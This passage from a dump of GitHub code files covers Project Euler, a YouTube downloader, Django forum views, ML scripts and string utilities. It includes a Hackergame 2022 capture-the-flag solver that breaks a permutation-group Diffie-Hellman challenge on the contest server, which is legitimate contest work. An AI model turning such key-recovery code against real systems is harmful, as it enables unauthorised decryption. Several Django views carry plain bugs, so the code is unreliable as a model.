svc_heatmap.savefig('svc_heatmap.png',dpi=400)\n \n print(classification_report(Y_test,svc_pred))\n\n # print(X_train.sample(20))\n \n\n\n","repo_name":"bfoysal/comp8380_python","sub_path":"classifiacation.py","file_name":"classifiacation.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27110176209","text":"# XXX slow. 
but works.\n# target = 10\ntarget = 2000000\nprimes = [2,3]\n\ndef is_prime(i):\n for p in primes:\n if i % p == 0:\n return False\n return True\n\ni = max(primes)+2\nwhile i<target:\n if is_prime(i):\n primes.append(i)\n print(i)\n i += 2\nprint(sum(primes))\n\n","repo_name":"tokuhirom/project-euler","sub_path":"010.py","file_name":"010.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2619361724","text":"import streamlit as st\n\nfrom pathlib import Path\nfrom youtube import Downloader\n\nst.title('YouTube Downloader')\n\n\"\"\"\nDownload videos or entire playlists from youtube. \nYou can specify if you want only audio, the video or both \nin separated files.\n\"\"\"\n\n\"\"\"\nWhat do you want to download?\n\"\"\"\n\nselection = st.selectbox(\"\", ['Video', 'Playlist'])\n\nlink = st.text_input(f'Add the link of your {selection}')\n\n\"\"\"\nChoose download type\n- Video: Normal youtube video\n- Only Audio: Just the audio of the youtube video \n- Audio and Video: This option downloads the audio and the video\nin separate files.\n\n#### Note: \n- If you are downloading a playlist, these options apply to every link\n- If the resolution is not available, it will download the highest\n\"\"\"\n\ndownload_type, resolution = st.beta_columns(2)\n\nwith download_type:\n download_selection = st.selectbox(\"Download Type\", ['Video', 'Only Audio', 'Audio and Video'])\n\nwith resolution:\n quality = st.selectbox(\"Quality\", ['highest', '720p', '480p', '320p', '240p', '144p'])\n\nif st.button('Download'):\n if selection == 'Playlist':\n playlist = True\n else:\n playlist = False\n if download_selection == 'Video':\n video = True\n audio = False\n elif download_selection == 'Only Audio':\n video = False\n audio = True\n else:\n video = True\n audio = True\n\n info = st.empty()\n\n downloader = Downloader(link, video=video, audio=audio, playlist=playlist, quality=quality, convert=True)\n\n info.info('Downloading...')\n downloader.download()\n text = f\"\"\"\n The download was successful \n Search for it at: {'./youtube_downloader/downloads/'}\n \"\"\"\n info.success(text)\n\n\n\n\n\n\n","repo_name":"JonathanElejalde/youtube_downloader","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11000043276","text":"import re\nimport sys\nfrom pwn import remote\nfrom permutation_group import permutation_element\nfrom sympy.ntheory.modular import crt\n\n\ndef calc(g, y):\n all_v = []\n all_m = []\n\n for subp in g.standard_tuple:\n n_mapping = dict()\n res2 = []\n\n for i, n in enumerate(subp, start=1):\n n_mapping[n] = i\n res2.append(y.permutation_list[n - 1])\n\n res1 = list(range(2, len(subp) + 1))\n res1.append(1)\n\n res2 = [n_mapping[i] for i in res2]\n\n p1 = permutation_element(len(subp), res1)\n p2 = permutation_element(len(subp), res2)\n\n acc = p1\n\n for i in range(p1.order()):\n if acc == p2:\n all_v.append(i + 1)\n all_m.append(p1.order())\n\n acc = acc * p1\n\n result, _ = crt(all_m, all_v)\n return result\n\n\nconn = remote(\"202.38.93.111\", 10114)\n\nconn.recvuntil(b'Please input your token: ')\nconn.sendline(sys.argv[1].encode())\n\nconn.recvuntil(b\"> your choice: \")\nconn.sendline(b\"2\")\n\nfor i in range(15):\n conn.recvuntil(b\"[+] DH public key: \")\n data = conn.recvline()\n n, *g_list = [int(x) for x in re.findall(rb'\\b\\d+\\b', data)]\n\n 
conn.recvuntil(b\"[+] my public key = \")\n data = conn.recvline()\n y_list = [int(x) for x in re.findall(rb'\\b\\d+\\b', data)]\n\n g = permutation_element(n, g_list)\n y = permutation_element(n, y_list)\n secret = calc(g, y)\n print(secret)\n\n conn.sendline(str(secret).encode())\n conn.recvuntil(b\"> your answer: Good job\\n\")\n\nprint(conn.recvline().decode())\nconn.close()\n","repo_name":"USTC-Hackergame/hackergame2022-writeups","sub_path":"players/cvhc/置换魔群/autorun2.py","file_name":"autorun2.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"44"} +{"seq_id":"26543358239","text":"from django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Max, Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\n\nfrom .forms import AddPostForm, AddTopicForm, LoginForm, ProfileEditForm, \\\n UserEditForm, UserRegistrationForm\nfrom .models import Section, Topic, Post, Profile, Message\n\nimport json\nimport redis\n\n# connect to redis\nr = redis.StrictRedis(host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n db=settings.REDIS_DB)\n\n# section views\ndef section_list(request):\n sections = Section.members.all()\n return render(request,\n 'forum/section_list.html',\n {'sections': sections})\n\n\ndef section_detail(request, section):\n section = get_object_or_404(Section,\n slug=section)\n # annotate each topic with its latest post and order the topics\n # by most recent post\n topic_list = Topic.objects.filter(\n section=section).annotate(\n latest_post=Max(\n 'topic_posts__created')).order_by('-latest_post')\n paginator = Paginator(topic_list, 5)\n page = request.GET.get('page')\n try:\n topics = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer then deliver the first page\n topics = paginator.page(1)\n except EmptyPage:\n # If page is out of range then deliver the last page\n topics = paginator.page(paginator.num_pages)\n\n return render(request,\n 'forum/section_detail.html',\n {'section': section,\n 'page': page,\n 'topics': topics})\n\n\n# topic views\ndef topic_detail(request, section, topic):\n section = get_object_or_404(Section,\n slug=section)\n topic = get_object_or_404(Topic,\n section=section,\n slug=topic)\n # increment the total views by 1\n r.incr('topic:{}:views'.format(topic.id))\n post_list = Post.objects.filter(topic=topic)\n paginator = Paginator(post_list, 5)\n page = request.GET.get('page')\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer then deliver the first page\n posts = paginator.page(1)\n except EmptyPage:\n # If page is out of range then deliver the last page\n posts = paginator.page(paginator.num_pages)\n\n return render(request,\n 'forum/topic_detail.html',\n {'section': section,\n 'topic': topic,\n 'page': page,\n 'posts': posts})\n\n\n@login_required\ndef add_topic(request, section):\n if request.method == 'POST':\n topic_form = AddTopicForm(request.POST)\n post_form = AddPostForm(request.POST)\n if topic_form.is_valid() and post_form.is_valid():\n cd_topic_form = topic_form.cleaned_data\n cd_post_form = post_form.cleaned_data\n\n # assign user and section to new topic\n new_topic = topic_form.save(commit=False)\n new_post = post_form.save(commit=False)\n\n 
topic_section = get_object_or_404(Section,\n slug=section)\n new_topic.owner = request.user\n new_topic.section = topic_section\n new_topic.save()\n\n # assign user and topic to opening post\n new_post.owner = request.user\n new_post.topic = new_topic\n new_post.save()\n\n return redirect('forum:section_detail', section)\n else:\n topic_form = AddTopicForm\n post_form = AddPostForm\n\n return render(request, 'forum/add_topic.html',\n {'topic_form': topic_form,\n 'post_form': post_form})\n\n\n# registration views\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # create a new user object but don't save\n new_user = user_form.save(commit=False)\n # set the chosen password\n new_user.set_password(user_form.cleaned_data['password'])\n # save the user\n new_user.save()\n # create the user profile\n profile = Profile.objects.create(user=new_user)\n return render(request,\n 'registration/register_done.html',\n {'new_user': new_user})\n else:\n user_form = UserRegistrationForm\n return render(request,\n 'registration/register.html',\n {'user_form': user_form})\n\n# login views\ndef user_login(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'],\n password=cd['password'])\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponse('Authenticated successfully')\n else:\n return HttpResponse('Disabled account')\n else:\n HttpResponse('Invalid login')\n else:\n form = LoginForm()\n return render(request, 'login.html', {'form': form})\n\n\n# post views\n@login_required\ndef add_post(request, section, topic):\n if request.method == 'POST':\n form = AddPostForm(data=request.POST)\n if form.is_valid():\n # form data is valid\n cd = form.cleaned_data\n new_post = form.save(commit=False)\n\n # assign current user and topic to post\n post_section = get_object_or_404(Section,\n slug=section)\n post_topic = get_object_or_404(Topic,\n section=post_section,\n slug=topic)\n\n new_post.owner = request.user\n new_post.topic = post_topic\n\n # save the post\n new_post.save()\n\n return redirect('forum:topic_detail', section, topic)\n else:\n form = AddPostForm\n\n return render(request,\n 'forum/add_post.html',\n {'form': form})\n\ndef update_likes(request):\n\n if request.method == 'POST':\n response_data = {}\n post_id = request.POST.get('post_id')\n post_action = request.POST.get('post_action')\n\n post = Post.objects.get(id=post_id)\n user = request.user\n if post.owner != user:\n\n if post_action == 'like':\n post.likes.add(user)\n else:\n post.likes.remove(user)\n post.save()\n\n response_data['result'] = 'updated'\n response_data['post_id'] = post.pk\n response_data['users_like'] = list(post.likes.all().values_list('username', flat=True))\n response_data['post_likes'] = post.likes.count()\n\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n else:\n return HttpResponse({'result': 'not updated'},\n content_type='application/json')\n else:\n return HttpResponse({'result': 'not updated'},\n content_type='application/json')\n# chat views\ndef add_chat_message(request):\n\n if request.method == 'POST':\n message_text = request.POST.get('chat_message_text')\n if message_text:\n user = request.user\n response_data = {}\n\n new_message = Message.objects.create(content=message_text,\n owner=user)\n new_message.save()\n\n response_data['result'] = 'created'\n 
response_data['message_pk'] = new_message.pk\n response_data['text'] = new_message.content\n response_data['created'] = new_message.created.strftime('%b %d, %Y %I:%M %p')\n response_data['owner'] = new_message.owner.username\n\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not created'}),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not created'}),\n content_type='application/json')\n\ndef refresh_chat(request):\n\n if request.method == 'POST':\n\n last_message = Message.objects.latest('created').content\n last_chat_message = request.POST.get('last_message')\n\n # check whether any new chat messages have been added\n if last_message != last_chat_message:\n response_data = {}\n\n # display the last five chat messages only\n messages = Message.objects.all()\n # need to convert to a list to use negative indexing\n last_ten_messages = list(messages.values('owner__username', 'created', 'content'))[-10:]\n last_ten_messages.reverse()\n for idx, message in enumerate(last_ten_messages):\n last_ten_messages[idx]['created'] = message['created'].strftime('%b %d, %Y %I:%M %p')\n\n response_data['result'] = 'refreshed'\n response_data['messages'] = last_ten_messages\n\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not refreshed'}),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not refreshed'}),\n content_type='application/json')\n\n# profile views\n@login_required\ndef edit(request):\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user,\n date=request.POST)\n profile_form = ProfileEditForm(instance=request.user.profile,\n date=request.POST,\n files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n else:\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n return render(request,\n 'forum/edit.html',\n {'user_form': user_form,\n 'profile_form': profile_form})","repo_name":"arrancardnell/DjangoForum","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20791013729","text":"\"\"\"\nAuthor - Raunak Mundada\nDate - 6/17/2017\n\"\"\"\n\n\"\"\"\nRuns a grid search for gradient boosting machines\non Mercedes-Benz dataset\n\"\"\"\n\nimport os\nos.chdir(\"D:/ML_Projects/MercedesBenz-Kaggle/\")\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import GridSearchCV, ShuffleSplit, KFold\nimport sklearn.metrics as mt\nfrom sklearn import ensemble\n\nnp.random.seed(12548)\n\ndef read_data():\n\ttrain_data = pd.read_csv(\"./data/train.csv\")\n\ttest_data = pd.read_csv(\"./data/test.csv\")\n\n\treturn train_data, test_data\n\n\ndef process_data(train_data, test_data):\n\tbinary_cols, all_zero_cols, all_one_cols = [],[],[]\n\tfor col in train_data.iloc[:,10:]:\n\t\tunique_vals = train_data[col].unique()\n\t\tif np.array_equal(unique_vals, [1,0]) or np.array_equal(unique_vals, [0,1]):\n\t\t\tbinary_cols.append(col)\n\t\telif np.array_equal(unique_vals, [0]):\n\t\t\tall_zero_cols.append(col)\n\t\telif np.array_equal(unique_vals, [1]):\n\t\t\tall_one_cols.append(col)\n\t\telse:\n\t\t\tprint(unique_vals)\n\n\t# Drop columns with 
only zeros\n\ttrain_data = train_data.drop(all_zero_cols, axis=1)\n\ttest_data = test_data.drop(all_zero_cols, axis=1)\n\n\ttrain_cat_cols = train_data.iloc[:,2:10]\n\ttest_cat_cols = test_data.iloc[:,1:9]\n\tfreq=[]\n\tcol_names = []\n\tcat_mismatch = []\n\n\tfor train_col, test_col in zip(train_cat_cols, test_cat_cols):\n\t\tcol_names.append(train_col)\n\t\ttrain_freq = len(train_cat_cols[train_col].unique())\n\t\ttest_freq = len(test_cat_cols[test_col].unique())\n\n\t\tif train_freq!=test_freq:\n\t\t\tcat_mismatch.append(train_col)\n\n\t\tfreq.append([train_freq, test_freq])\n\tfreq = pd.DataFrame(freq, columns=['Train_Freq', 'Test_Freq'], index=col_names)\n\n\ttrain_data = train_data.drop(cat_mismatch, axis=1)\n\ttest_data = test_data.drop(cat_mismatch, axis=1)\n\n\treturn train_data, test_data\n\n\ndef prepare_data_ml(train_data, test_data):\n\tX_train = pd.get_dummies(train_data)\n\tX_train = X_train.drop(['ID','y'], axis=1).values\n\ty_train = train_data.y.values\n\n\tX_test = pd.get_dummies(test_data)\n\ty_test_id = test_data.ID.values\n\tX_test = X_test.drop(['ID'], axis=1).values\n\n\treturn X_train, y_train, X_test, y_test_id\n\n\ndef gridSearch_gbm(X_train, y_train, K=5):\n\tparam_grid = param_grid = {'n_estimators': [100,500,1000], 'max_depth': [3,5,10],\n\t\t\t\t\t\t\t\t'min_samples_split': [2],\n\t\t\t\t\t\t\t\t'learning_rate':[10e-3, 10e-2,10e-1] ,\n\t\t\t\t\t\t\t\t'loss': ['ls','huber'],\n\t\t\t\t\t\t\t\t'subsample':[1], 'max_features':['sqrt','log2'],\n\t\t\t\t\t\t\t\t'criterion':['friedman_mse']}\n\n\tcv_kfold = KFold(n_splits=K, shuffle=True, random_state=12548)\n\n\tgbm_regressor = ensemble.GradientBoostingRegressor(random_state=122)\n\n\tgs_gbm = GridSearchCV(estimator=gbm_regressor,\n\t param_grid=param_grid,\n\t scoring='r2',\n\t cv=cv_kfold,\n\t n_jobs=-1,\n\t verbose=1)\n\tgs_gbm.fit(X_train, y_train)\n\tprint(gs_gbm.best_score_)\n\n\treturn gs_gbm.best_estimator_\n\n\ndef eval_gbm(gbm_regressor, X_train, y_train, K=5):\n\tcv_ss = ShuffleSplit(n_splits=K, test_size=0.3, random_state=12548)\n\treg_scores = []\n\n\tfor train_idx, val_idx in cv_ss.split(X_train, y_train):\n\t\tx_train_cv, y_train_cv = X_train[train_idx], y_train[train_idx]\n\t\tx_val_cv, y_val_cv = X_train[val_idx], y_train[val_idx]\n\n\t\treg_model = gbm_regressor\n\t\treg_model.fit(x_train_cv, y_train_cv)\n\t\ty_pred_cv = reg_model.predict(x_val_cv)\n\n\t\tr_2 = mt.r2_score(y_val_cv, y_pred_cv) # Coefficient of determination\n\t\tmse = mt.mean_squared_error(y_val_cv, y_pred_cv) # Mean squared error\n\t\texplained_var = mt.explained_variance_score(y_val_cv, y_pred_cv) # Explained variance\n\n\t\treg_scores.append([r_2, mse, explained_var])\n\n\treg_scores = pd.DataFrame(reg_scores, columns=['R^2','MSE','Explained_Variance'])\n\treturn reg_scores\n\n\ndef make_submission(reg_estimator, X_test, ID, fname='FinalSubmission'):\n y_pred = reg_estimator.predict(X_test)\n final_submission = pd.DataFrame(np.hstack([ID[:,np.newaxis], y_pred[:,np.newaxis]]), columns=['ID','y'])\n final_submission.ID = final_submission.ID.astype(int)\n final_submission.to_csv('./results/'+fname, index=False)\n return final_submission\n\n\ndef run_gridSearch_gbm():\n\tprint(\"Read and preprocess data\")\n\n\ttrain_data, test_data = read_data()\n\ttrain_data, test_data = process_data(train_data, test_data)\n\n\tX_train, y_train, X_test, y_test_id = prepare_data_ml(train_data, test_data)\n\n\tprint(\"Training Samples: \", X_train.shape)\n\tprint(\"Test Sample: \", X_test.shape)\n\n\tprint(\"============ Grid Search GBM 
================\")\n\n\tgbm_best_estimator = gridSearch_gbm(X_train, y_train, K=3)\n\tprint(gbm_best_estimator)\n\n\nif __name__ == '__main__':\n\tstart_time = time.time()\n\trun_gridSearch_gbm()\n\tprint(\"----%s seconds----\"%(time.time()-start_time))\n","repo_name":"raunakm90/ML_Projects","sub_path":"MercedesBenz-Kaggle/gbm.py","file_name":"gbm.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12459314387","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\na=[]\nnumber=int(input(\"number of elements\"))\nfor i in range(1,number+1):\n value=int(input(\"enter the value of %d elements:\" %i))\n a.append(value)\nprint(\"positive numbers in the list are :\")\nfor j in range(number):\n if(a[j]>0):\n print(a[j],end= ' ')\n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Geethu1502/Geethu","sub_path":"Untitled7.py","file_name":"Untitled7.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37187860311","text":"import os\nimport random\nimport asl\nfrom mniststack import train_stack, stack_args\nimport torch\nfrom common import trainloadsave\nfrom asl.loss import mean\nfrom torch import optim\nimport torch.nn.functional as F\n\ndef tracegen1(nitems, nrounds):\n def trace1(items, r, runstate, push, pop, empty):\n \"\"\"Push push push, pop pop pop\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n for i in range(nitems):\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n for j in range(nitems):\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.{}.{}\".format(nr, j), runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n \n return pop_item\n \n return trace1\n\ndef tracegenclassic(nitems, nrounds):\n def trace(items, r, runstate, push, pop, empty):\n \"\"\"Example stack trace\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n (pop_stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop1\", runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), pop_stack)\n\n (pop_stack, pop_item) = pop(pop_stack)\n asl.observe(pop_item, \"pop2\", runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), pop_stack)\n return pop_item\n\n return trace\n\ndef optim_sampler():\n lr = 0.001\n optimizer = optim.Adam\n return {\"optimizer\": optimizer,\n \"lr\": lr}\n\ndef stack_optspace():\n arch_opt = {'batch_norm': True,\n 'h_channels': 8,\n 'nhlayers': 4,\n 'activation': F.elu,\n 'ks': 3,\n 'last_activation': F.elu,\n 'learn_batch_norm': True,\n 'padding': 1}\n\n return {\"tracegen\": tracegenclassic,\n \"nrounds\": 1,\n \"dataset\": \"omniglot\",\n \"nchannels\": 1,\n \"nitems\": 2,\n \"normalize\": [True],\n \"batch_size\": [32],\n \"learn_constants\": [True],\n \"accum\": mean,\n \"init\": [torch.nn.init.uniform],\n \"arch_opt\": arch_opt,\n \"optim_args\": optim_sampler}\n\ndef traces_gen(nsamples):\n # Delaying computation of this value because we dont know nsamples yet\n return asl.prodsample(stack_optspace(),\n to_enum=[],\n to_sample=[\"init\",\n \"batch_size\",\n \"lr\",\n \"learn_constants\",\n \"normalize\"],\n 
to_sample_merge=[\"optim_args\"],\n nsamples=nsamples)\n\nif __name__ == \"__main__\":\n thisfile = os.path.abspath(__file__)\n res = trainloadsave(thisfile,\n train_stack,\n traces_gen,\n stack_args)","repo_name":"zenna/asl","sub_path":"aslbench/basicstacktrain.py","file_name":"basicstacktrain.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71839646854","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nstring.py\n\nstring utility\n\n\n\"\"\"\n\nimport re\nimport datetime\n\n\n# douban-utils copy begin.\n# follow code block were copy from douban-utils (https://github.com/douban/douban-utils)\n\ndef trunc_utf8(string, num, etc=\"...\"):\n \"\"\"truncate a utf-8 string, show as num chars.\n arg: string, a utf-8 encoding string; num, look like num chars\n return: a utf-8 string\n \"\"\"\n gb = string.decode(\"utf8\", \"ignore\").encode(\"gb18030\", \"ignore\")\n if num >= len(gb):\n return string\n ret = gb[:num].decode(\"gb18030\", \"ignore\").encode(\"utf8\")\n if etc:\n ret += etc\n return ret\n\n\ndef decode_utf8_str(c):\n try:\n if isinstance(c, unicode):\n return c\n content = unicode(c, 'utf8', errors='replace')\n except TypeError:\n content = unicode(c, errors='replace')\n return content\n\n\ndef trunc_short(s, max_len=210, etc=\"...\"):\n s = decode_utf8_str(s)\n if len(s) >= max_len:\n s = s[:max_len] + unicode(etc)\n return s\n\n\ndef utf8_length(string):\n return string and len(string.decode(\"utf8\", \"ignore\").encode(\"gb18030\", \"ignore\")) or 0\n\n\ndef trunc_utf8_by_char(s, num, etc=\"...\"):\n unistr = decode_utf8_str(s)\n if num >= len(unistr):\n return s\n s2 = unistr[:num].encode(\"utf8\")\n if etc:\n s2 += etc\n return s2\n\n\ndef js_quote(js):\n return js.replace('\\\\', r'\\\\').replace('\\r', r'\\r') \\\n .replace('\\n', r'\\n').replace(\"'\", r\"\\'\").replace('\"', r'\\\"')\n\n\nEMAILRE = re.compile(r'^[_\\.0-9a-zA-Z+-]+@([0-9a-zA-Z]+[0-9a-zA-Z-]*\\.)+[a-zA-Z]{2,4}$')\n\n\ndef is_valid_email(email):\n if len(email) >= 6:\n return EMAILRE.match(email) != None\n return False\n\n\ndef format_rfc822_date(dt, localtime=True, cookie_format=False):\n if localtime:\n dt = dt - datetime.timedelta(hours=8)\n fmt = \"%s, %02d %s %04d %02d:%02d:%02d GMT\"\n if cookie_format:\n fmt = \"%s, %02d-%s-%04d %02d:%02d:%02d GMT\"\n\n # dt.strftime('%a, %d-%b-%Y %H:%M:%S GMT')\n return fmt % (\n [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"][dt.weekday()],\n dt.day,\n [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\",\n \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"][dt.month - 1],\n dt.year, dt.hour, dt.minute, dt.second)\n\n\ndef format_cookie_date(dt, localtime=True):\n return format_rfc822_date(dt, localtime=True, cookie_format=True)\n\n\ndef is_ascii_string(text):\n if not isinstance(text, basestring):\n return False\n replace = [c for c in text if not (' ' <= c <= '~')]\n if replace:\n return False\n else:\n return True\n\n\n# douban-utils end.\n\n\ndef str2bool(s, default=False):\n \"\"\"Convert str to bool value\n\n >>> str2bool('') or str2bool(u'') or str2bool(None)\n False\n >>> str2bool('on') and str2bool(u'on') and str2bool(u'1') and str2bool('1')\n True\n \"\"\"\n if not s:\n return False\n if s in ('', u''):\n return False\n s = s.lower()\n if s in (u'on', u'true', u'1', 'on', 'true', '1'):\n return True\n if s in (u'off', u'false', u'0', 'off', 'false', '0'):\n return False\n return default\n\n\n_first_cap_re = 
re.compile('(.)([A-Z][a-z]+)')\n_all_cap_re = re.compile('([a-z0-9])([A-Z])')\n\n\ndef dashify(name):\n s1 = _first_cap_re.sub(r'\\1-\\2', name)\n return _all_cap_re.sub(r'\\1-\\2', s1).lower()\n\n\ndef camel_to_snake(name):\n s1 = _first_cap_re.sub(r'\\1_\\2', name)\n snake_str = _all_cap_re.sub(r'\\1_\\2', s1).lower()\n return snake_str.replace('__', '_')\n\n\ndef dash_to_camel(dashed_str):\n return _convert_to_camel(dashed_str, '-')\n\n\ndef snake_to_camel(snake_str):\n return _convert_to_camel(snake_str, '_')\n\n\ndef snake_to_cap(snake_str):\n return _convert_to_camel(snake_str, '_', True)\n\n\ndef _convert_to_camel(snake_cased_str, separator, first_cap=False):\n components = snake_cased_str.split(separator)\n preffix = \"\"\n suffix = \"\"\n if components[0] == \"\":\n components = components[1:]\n preffix = separator\n if components[-1] == \"\":\n components = components[:-1]\n suffix = separator\n if len(components) > 1:\n camel_cased_str = components[0].title() if first_cap else components[0].lower()\n for x in components[1:]:\n if x.isupper() or x.istitle():\n camel_cased_str += x\n else:\n camel_cased_str += x.title()\n else:\n camel_cased_str = components[0].title()\n return preffix + camel_cased_str + suffix\n\n\ndef quote_xml(in_str):\n if not in_str:\n return ''\n s1 = (isinstance(in_str, basestring) and in_str or\n '%s' % in_str)\n s1 = s1.replace('&', '&')\n s1 = s1.replace('<', '<')\n s1 = s1.replace('>', '>')\n return s1\n\n\ndef quote_xml_attrib(in_str):\n s1 = (isinstance(in_str, basestring) and in_str or\n '%s' % in_str)\n s1 = s1.replace('&', '&')\n s1 = s1.replace('<', '<')\n s1 = s1.replace('>', '>')\n if '\"' in s1:\n if \"'\" in s1:\n s1 = '\"%s\"' % s1.replace('\"', \""\")\n else:\n s1 = \"'%s'\" % s1\n else:\n s1 = '\"%s\"' % s1\n return s1\n","repo_name":"liqiwudao/job","sub_path":"utils/strtools.py","file_name":"strtools.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33818387828","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport barf\nimport process\n\n\"\"\"\n\tSo, the plan here is to do checks (configuration, plugin, brain sanity)\n\tsince we do virtually NONE of that. We just blindly run and crash.\n\tIt sucks. :( This is where we'll do more sane importing too, so we aren't\n\timporting the same files over and over again. 
\n\t\n\tThis is where we will also expose internals for plugins to use.\n\t\n\t- cptmashek, 20140701\n\"\"\"\n\nclass scrib:\n\t\"\"\"\n\tSetting up gatekeeping.\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tHere we'll load settings and set up modules.\n\t\t\"\"\"\n\t\tself.barf = barf.Barf\n\t\tself.process = process.process()\n\t\tself.settings = '' # compat, ugly.\n\t\tself.debug = self.getsetting('brain', 'debug')\t\t\n\n\t\tself.barf('MSG', 'Scrib %s initialized' % self.process.version)\n\n\t\n\t\"\"\"\n\tDown here, we are making some methods that give interfaces and plugins\n\tinformation in a controllable (and updatable) way.\n\t\"\"\"\n\t\n\tdef setcfg(self):\n\t\t\"\"\"\n\t\tSimple wrapper for cfg.set()\n\t\t\"\"\"\n\t\treturn self.process.cfg.set()\n\n\tdef save_all(self, interface, restart_timer=True):\n\t\tself.savesettings()\n\t\tself.process.brain.__save(interface, restart_timer)\n\n\tdef shutdown(self, interface):\n\t\t\"\"\"\n\t\tShuts us the scrib down.\n\t\t\"\"\"\n\t\tself.__save()\n\t\treturn self.process.brain.shutdown(interface)\n\n\tdef setsetting(self, module, setting, set):\n\t\t\"\"\"\n\t\tSet brain setting.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tif module == 'scrib':\n\t\t\t\tmod = self.process.settings\n\t\t\telif module == 'brain':\n\t\t\t\tmod = self.process.brain.settings\n\t\t\tsetattr(mod, setting, set)\n\t\texcept AttributeError:\n\t\t\tself.barf('ERR', 'No %s setting in %s' % ( setting, module ))\n\n\tdef getsetting(self, module, setting):\n\t\t\"\"\"\n\t\tGet brain setting.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tif module == 'scrib':\n\t\t\t\treturn getattr(self.process.settings, setting)\n\t\t\telif module == 'brain':\n\t\t\t\treturn getattr(self.process.brain.settings, setting)\n\t\texcept AttributeError:\n\t\t\tself.barf('ERR', 'No %s setting in %s' % ( setting, module ))\n\t\n\tdef __save(self):\n\t\tif self.debug == 1:\n\t\t\tself.barf('DBG', 'Saving process settings.')\n\t\tself.process.settings.save()\n","repo_name":"RobertTheMagnificent/scrib","sub_path":"core/scrib.py","file_name":"scrib.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"8836505688","text":"\"\"\"This file holds all the functions for executing the app\"\"\"\n\nfrom google.cloud import datastore\nfrom datetime import datetime\nfrom flask import request\nimport json\nimport yagmail\nimport csv\n\n\nclass DSSurvey:\n \"\"\"This class is for creating the survey and collecting responses in main.py file.\n 'surveys' Kind in Datastore is for holding the survey templates, which are keyed by their\n survey date. Survey responses are stored in a distinct kind for that survey date.\"\"\"\n # Datastore structure for survey creation is question, report, a1-a`n`\n\n def __init__(self):\n self.datastore_client = datastore.Client()\n self.kind = f\"{datetime.utcnow().strftime('%m%d%y')}survey\"\n self.sourcekind = \"surveys\"\n return\n\n def make(self, path):\n \"\"\"Read a csv file to make the survey key in DataStore. 
